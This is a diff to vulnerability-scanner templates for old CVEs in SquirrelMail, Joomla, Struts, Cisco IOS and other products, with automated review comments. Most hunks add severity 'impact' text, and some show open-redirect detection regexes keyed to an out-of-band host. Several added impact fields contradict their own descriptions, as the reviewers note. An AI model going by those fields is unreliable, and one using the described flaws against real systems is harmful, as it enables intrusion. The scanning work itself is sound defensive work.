# digest: 4a0a00473045022034ca38e42eb10e3f993e1ec2346f3c0e8136adef3383573241671c6fc5c91e5e022100a81c4851e42aa7d04d2e7db0c381712c112273dfd1dba5c3673643e239dd5342:922c64590222798bb761d5b6d8e72950 - type: status
status:
- 200
# digest: 4a0a00473045022100c1f96a2e3c37026b0ac58408bbaaeff224ca2cd563e06d2861342ab73272d43602203a4b1a825e300c2d3243c6930d34d7108e534729c14184babc398ba3fb3a0956:922c64590222798bb761d5b6d8e72950
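Review bot: The single word `"NzbwpQSdbY06Dngnoteo2wdgiekm7j4Ndisplay_errors"` in the word matcher requires the marker and `display_errors` to appear back to back in the body, which the old two-word list with `condition: and` did not; as rendered, it looks as if the two list items were fused rather than changed on purpose. With `matchers-condition: and` still in place, a response that puts any character between the two tokens would no longer match, so an affected host would be reported clean. The request that produces the body is outside this hunk, so adjacency cannot be confirmed from here. If it is not guaranteed, keep the entries `- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"` and `- "display_errors"` with `condition: and`; if it is, a comment such as `# marker is echoed immediately before the setting name` would record why one string is enough.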


@ -4,6 +4,8 @@ info:
name: 360 Xintianqing - SQL Injection name: 360 Xintianqing - SQL Injection
author: SleepingBag945 author: SleepingBag945
severity: high severity: high
description: |
The Tianqing Terminal Security Management System, designed for government and enterprise use, faces a SQL injection vulnerability. This flaw could enable attackers to access sensitive database information.
reference: reference:
- https://blog.51cto.com/u_9691128/4295047 - https://blog.51cto.com/u_9691128/4295047
- https://www.cnvd.org.cn/patchInfo/show/270651 - https://www.cnvd.org.cn/patchInfo/show/270651
@ -38,5 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100e6b9c102bfc4fd3eaa2d00c82e03d07f7309513da8828cc6c303d4d071c2d5540221009d3c3f3d937d8ac546abaa6d94a3aee02d5c4c7c8831dfbce456591d4b252eda:922c64590222798bb761d5b6d8e72950
# digest: 4a0a00473045022006cca5f941e35ce5c204962052c2d4eb74627fc58d6de9b9976b967b1643ea8f022100e2b50bf34a6ee4636802796f5b1e866212a29264161bbc98a5553a60186651d1:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: r3naissance author: r3naissance
severity: medium severity: medium
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
impact: |
High: Remote code execution or denial of service.
remediation: Upgrade to the latest version. remediation: Upgrade to the latest version.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a004630440220080130ec958d5667203f63c2fb769d081d8684edeb1132b8114624eb9cefeeeb022015c92a448c22916bdc29de05205539f746ae2fc9b6b641b54ef2b913d151c11f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100d75cf6bb5b96928d10a267c9d3b68c6d215cafe2f946fc1e3c6faa5ba73986d1022100cf0262c0fa9aa5da8c6f8751c553cc77be07ca9fc62f3aec8bb35a8b9f16b490:922c64590222798bb761d5b6d8e72950
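Review bot: The added `impact` text, "High: Remote code execution or denial of service.", does not match the `description` directly above it, which describes disclosure of the anonymous account name through an RPC POST to shtml.dll, nor the `severity: medium` in the same block. Anyone triaging findings from this template by the impact field would over-prioritise what the description presents as an information leak. A wording that stays within the description would be `impact: Remote attackers can learn the name of the anonymous account.` The `info` block starts above the hunk.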


@ -6,6 +6,8 @@ info:
severity: critical severity: critical
description: | description: |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
remediation: | remediation: |
Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
reference: reference:
@ -47,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022058d9a8ffc9ad0c9eb0fa65e129eec136d44e8e6582b68665220d55745cff08270220209369d1debe9d289316990990aee95bdaa71cd748bcd23d1f7189442c298347:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201446b3c9bf46dead91bf4ef4ad77cbe180d6d69fb175901a10fa0c1ede45e8640221009f8fada5bf28bf8ede431e3ef75a13367f4164a18df286db6e1528ed038181da:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: high severity: high
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
remediation: | remediation: |
Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability.
reference: reference:
@ -53,4 +55,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100919662cf99fc2c8685a185341929e70c52f2d6e4708bffe8294fe45d56f7cb81022071b199174fe64ab885ef44d2c7d1e298ea1ee34b6eab5737b7afb1bd0b713799:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220097cefba0b33bb087a8dba970ed43866b17c92bfc316e2e3d619b9b6485b57710221009ad2de84214b6c521984839454d0766d906957945e2b51dce527cd4c0cc82c50:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
remediation: Upgrade to the latest version. remediation: Upgrade to the latest version.
reference: reference:
- https://www.exploit-db.com/exploits/24068 - https://www.exploit-db.com/exploits/24068
@ -46,4 +48,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402205d3c4477a61a53a5207dd95d10b69b27e255779626d269dd24c329d22d574969022037aecc3ef5111112878affc3d64765c06c484c318e8435b97dcf1f44c9c9daac:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221009838e283e3afa06a62182a21bc8b0059f223c7716b521ee426f5a5971f3feadf022100dd82c1e652cb490cb66a1a96bc0aca2beecdf45fedf86f75b5376ac8fc69c6d3:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.
impact: |
Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.
remediation: | remediation: |
Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.
reference: reference:
@ -37,4 +39,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a004730450220464a4d9ce1d6cbeaf71f551a06fd319a5a15203f7c40b1228809ef413ce6d869022100cb853dd541a12cbe5b12d10daaebc247d1b20e32d173b410d5191367fb6f5839:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100aa37066896608be1f1389ed813b9756b52f89f2581a494bf04c0e91f743d7cd3022012425b62227648da21636d2b3acaa1fdb865e29f57e39c13c84e0e2511f4c908:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: CasperGN author: CasperGN
severity: medium severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
impact: |
The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
reference: reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c31e97e6801605f82c05e1819cf99bdb1e7ad21b859fbf96bab1d67b1496832302201de7a5c5f9fd1f832a121691d1c419464c4d56aa1261f00b415c933633470308:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202fa68c993471257cf8942b7addbd0c8ba10500cf91c42f00109404cec47f6af0022100e5d9e9567e00ffecb85211757541b21325517ca1cba3705fa3c8e4437bf71706:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
impact: |
An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c038f1228140ac219d52db4ac935001c95f9c1d446165668109ce4beee89ce54022053555ab9030c57883e97f6b5387e415d1116add7b8c7d61fcf0f53f8f63abb6d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022012df863c30fb119eab34b1e075cfc549f79b962d5ee0256cc191605f184b042c022100ee6d6910021f8368041415f1c29568a224afa0bd4c90711c6ecef91e15f67a13:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter.
impact: |
An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
remediation: | remediation: |
Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a0046304402201ed65f33515c85457e0554acc0db27813e67680002c76547791a87a2528ee8f702200cf156ab25abae0ba9b6284d127206b2afbbf1449ef60b0bd8d1643a3ab35938:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bd85215e179a268944da628fd2825c25be84f1d781f2eb54871fa7e3e13d9e9e022100d3ddb1c0a27197923318f0dd20a6ba42024cfd43b86ef1ab690f72558f0d6c36:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a004630440220109614eef224949e56be06ed96b7253bf9eeaaaca6b3e4d13bad94f187f50763022025be825f048689d4e2fb40c8cab4f5be2a16e56a263e77a4c10b8b718f948edc:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502207b167d92c80698ced12089ab60b5599c68ac644764fc7c498b54ba3b419645a7022100df03e54fcb0545995de5efa160937f4291cc667f1492d78e48ce8afcff374056:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022033ff4b2d0618993f110bdcee1826f352569694a911159307a8f47963b4726556022038d273a79b3532c7f80935bec832c34c7892f005e3108ecc80ca91912b3eb12e:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502200a624286010449dfbca736566eca4b83ef242b54957df99d637e088e9f74d226022100df79ccce801ecbe05018cb6c9e29bc7f6acf5836a0f68bc4640d5c55a8fdbdbf:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: dhiyaneshDk author: dhiyaneshDk
severity: high severity: high
description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
remediation: | remediation: |
Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100cf681f51c8fd7ad8f71ddb5ab7fbf70ab26af8ef9f4e1eecf899ef7e15a9cfc7022100fd0d57febf53d04624632cee41a8d0d9e2d2fccd8fb7fa76c099ec12679f4da0:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022070351a9e8db3cd73242680b18ba040226de4685b2c47e1382a982513fb0fc4f6022100e11c42b749f6d407caa47bb25997db8749ff4658e5d89ccf2215774153751083:922c64590222798bb761d5b6d8e72950
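Review bot: The added `impact` mentions only reading sensitive files, while the `description` in the same hunk says the flaw lets remote attackers execute arbitrary PHP code via a URL in the plugins array parameter, so the field understates the risk for a `severity: high` template. A wording consistent with the description would be `An attacker can execute arbitrary PHP code on the server, which may lead to compromise of the SquirrelMail installation.` The Joomla! Image Browser section further down has the same gap: its description says "include and execute arbitrary local files" at `severity: critical`, but its impact lists only file reads and data leakage. The `info` block starts above the hunk.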


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450220712fc391a3e3be1f9f89f83c89ca00e016a1ae009e593ef7f256bc272a71792f022100eddfcc0868a4e91ff4b82eaa8fa52e5f192d150f48f12b868d02d656b1a5f363:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100b096332d183a0234d0cbd3bfbc4b5149fddfbfe961ca49519ef85975a12413e50221008eee0c4a8fbdcd33a40800400dd5bd396f02ffb63cb375616260a0d10b0fce8d:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
impact: |
Remote code execution
remediation: | remediation: |
Update to the latest version of Apache Struts2 Update to the latest version of Apache Struts2
reference: reference:
@ -49,4 +51,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022063c92b81235f315f81680c3e5e93dc814dfe125814e43dcb6cff373d90d06df2022100a730d9a5439ccba872f1932b6625658746e1dedae50d3d88b40a0e484f9399cd:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100efb00dfbe2fbe5543741c32ac6e81e36f307f5d67597644c0e036fb51692ea570220191deb545db561480334ffe98f010ae2ca82883fae8e71451c75675f56ee4501:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: dhiyaneshDK author: dhiyaneshDK
severity: medium severity: medium
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor.
reference: reference:
@ -50,4 +52,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100ad3097a5f6494d45fc14b874469d62f42b9c84b273bc97b0688766f2d713b972022100e9ef7b1933fd6aa3ae8272f3d178f59cab4f4f5998bf9faaa1791557fec4245c:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: high severity: high
description: | description: |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.
remediation: | remediation: |
Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100db5f69276d7187ac5e9ccd8fd496e438c208ccece891c346d8bde457e12843ed02204a3892717752fadf89f73626fb71fb105db24ea7b2a8f774024dc523cbaa3831:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502202baf6dbc687b03d671808dd265b4bd483e0db5122a79101074736b0280a3b8a6022100fe1672451273fca5b4feda5dac2ed3961821928bc670fa6690bb5a5816910bd2:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: | remediation: |
Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022009e0335783eef020014410f2e510ddaeb0729cbd858f61bd7142e3099b53a47e022064cfb538a41735c933bef0eec4be787cb021a3e82f3ed2904ecaecb8b3f60015:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d8a1715cd99d2a316fc96a49ad96d5fcb9e60d314fa0227f341da5c5964d63d1022034fc66ce4d2ff88c7bbaad9997d6a4da683cffe1a97d693b84d3918d4654d340:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter.
impact: |
An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks.
remediation: | remediation: |
Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server.
reference: reference:
@ -40,4 +42,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100ea8393f7c2fcb36e817067e028b4eb79d7da58d6cb3df979f437089ae9ec5b44022100b5b40586f3165ddb2cbf5e9678ec12ed29ef4c8039ab93e0a5b04f0aa31a595e:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022042de3ed0e9fbe496c588f3edb67152006b98090716fbf000556dc8edaf836bf9022056dc3d31d210a950d8ddc0f728c2e9712fe5ec45775636b0fbb655b92a58e095:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: unstabl3 author: unstabl3
severity: medium severity: medium
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: | remediation: |
Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502204c02560c678b8087c28bfeed200bf5f25dc9f74261527fa9d7a2fb3b146becf8022100dee5ed65d2accf8d9f2bd7d38d04efb7b5eb7e70f8a26b9ebb580f3c5279e580:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950


@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
remediation: | remediation: |
Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor.
reference: reference:
@ -45,4 +47,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502203023e84e303b4688ad150f602ceea289a63ee29df8e12b9f39e6ebac23772d86022100f6e29101c5642afe45708838994bce4898278fe0adfb03b7b2124b7f0ceef30f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bbdf518966c75a44af19b519ed2a3d642aced2b7aaff600afa01c21c5509066f0221009c184332053f598d45bba3340388cadda4c7c8b8dabdb66884deea62912365b3:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: critical severity: critical
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: | remediation: |
